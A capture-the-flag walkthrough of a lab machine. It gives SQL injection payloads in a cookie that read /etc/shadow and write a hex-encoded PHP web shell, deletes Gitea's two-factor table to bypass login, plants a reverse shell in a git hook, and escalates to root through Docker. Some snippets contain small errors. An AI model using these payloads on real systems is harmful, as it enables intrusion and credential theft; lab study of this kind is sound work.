Level : Medium
- Privilege Escalation
We start our war by scanning the target machine to identify the open service . Here we deploy our weapon called rustscan .
rustscan --ulimit 5001 10.10.138.129 -- -sC -sV -oN nmap
From result we found port 22 (ssh) , 80 (HTTP) service are running .
Now its time to get more information about the service so we start our Dirb and gobuster but no success so we start manual testing . Therefore we navigate to a web browser for exploring HTTP service.
now here is the twist that every time we refresh the page we get the new queue number , after sometime we make some changes to cookie value and this is responsible for queue number . At this moment we try our sqli injection fuzzing and break the query by putting ‘ at the end of cookie value . If you are new to SQL injection you can try out the tryhackme SQL lab .
Now we know that SQL vulnerability is there and we are going to start our manual approach.
- So first find out the columns .
- Identify the Leak parameter .
- Then dump out the some information like database name or version .
- Dump out the tables from database .
- Dump out the columns
- At last dump out the content
Now let dumb out the total number of columns we have .
cfd844b81e6048155702a4d80d54a8ec' order by 5 --+
Now we know that there will be less then 5 columns actually we have two columns .
cfd844b81e6048155702a4d80d54a8ec' order by 2 --+
After finding out the columns we have to find out the leak parameter which is second columns
cfd844b81e6048155702a4d80d54a8ec' union all select1,2 --+
Now its time to dump out the some information like database name or version ,etc
cfd844b81e6048155702a4d80d54a8ec' union select 1,database() --+
Database name is “webapp” , let dump out the tables
cfd844b81e6048155702a4d80d54a8ec'union select 1,group_concat(table_name) from information_schema.tables where table_schema='webapp' --+
Table we get from the database is “Queue” .
After getting information about the Table its time to dumb out the column information .
cfd844b81e6048155702a4d80d54a8ec'union select 1,group_concat(column_name)from information_schema.columns where table_name='queue' --+
Columns we get are UserId and QueueNum . At this moment we didn’t find any user information like name , password hashes ,etc . After some time we was try to read the file by load_file function and we get success, we can read the system file using the SQL injection vulnerability .
cfd844b81e6048155702a4d80d54a8ec'union all select 1,load_file('/etc/shadow')--+
After reading on internet we figured out that we can also write the file on the server . Here we prepare our payload in the PHP so that we can create some command execution but before that we try to put a simple HTML file so that we can confirm it that this technique is working or not and as show in figure its working fine .
cfd844b81e6048155702a4d80d54a8ec' union all select 1,'hey checking wrtting' into outfile '/var/www/html/test.html' --+
Now let put our payload
cfd844b81e6048155702a4d80d54a8ec' union select 1,'<?php system($_GET['cmd']) ?> into outfile '/var/www/html/rce.php' --+
But it get detected but when we convert the payload string into hex format and then write it bypass this filter.
cfd844b81e6048155702a4d80d54a8ec' union select 1,unhex('3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E') into outfile '/var/www/html/rce1.php' --+ curl http://10.10.138.129/rce1.php?cmd=id
Our payload get successfully implanted on the server and now we can execute system level commands and with the help of this payload and we get our netcat shell .
Let put the reverse shell on the server by hosting it locally and then call the shell to server and execute it with our payload .
Shell successfully planted , let execute it using curl or browser .
Here we get our netcat session now it time to move upward to root user ,therefor more enumeration we have to do and we find our the some file is “dylan” user home directory . one is user flag and another is work_analysis file in which we get the password of that user .
cd /home/dylan ls cat work_analysis | grep dylan
we know the user and password , which give us the ssh login directly to the server
ssh [email protected] password you will get while solving it .
After login we check out the running service , socket connection at internal level we get that there is service running locally and we are going to forward that service to our system by doing local ssh port forwarding .
After doing the port forwarding we start accessing the that service at local address at port 3000 and this some git service and version is 1.13.0 .
Here the twist occur again when we doing login with dylan credentials we get the two-factor authentication and the source code of this application is also located at “/gitea” location and in that source code folder we see that there is database file and we can easily make the modification in that database by using python .
cd /gitea/gitea python3 import sqlite3 con = sqlite3.connect('gitea.db') cursor.execute("SELECT name FROM sqlite_master WHERE type='table';") print(cursor.fetchall()) cursor.execute("delete from two_factor") con.commit()
After commit we refresh the application and we make the login and easily bypass the two_factor authentication and we are in the application which look like the git .
I solve many labs in which git is used so with that experience i simply go to setting and deploy my reverse shell in git-hooks
here we put the simple reverse shell and update the hook and now its time to exploit this service by cloning the repo make some changes and commit and push it .
git clone http://localhost:3000/Dylan/Test-Repo.git cd Test-Repo echo "hey new changes pentestsky" >README.md git add README.md git commit -m "pentestsky new changes" git push
and another side we get the session but this session is of an docker container and home directory of the git user is the same file system where our source code is located and we can confirm it by listing the items .
This is the open and shut case , here we first deploy the bash binary with help of docker container with root user and then back to dylan account and run that bash binary which we already make the modification using docker root user.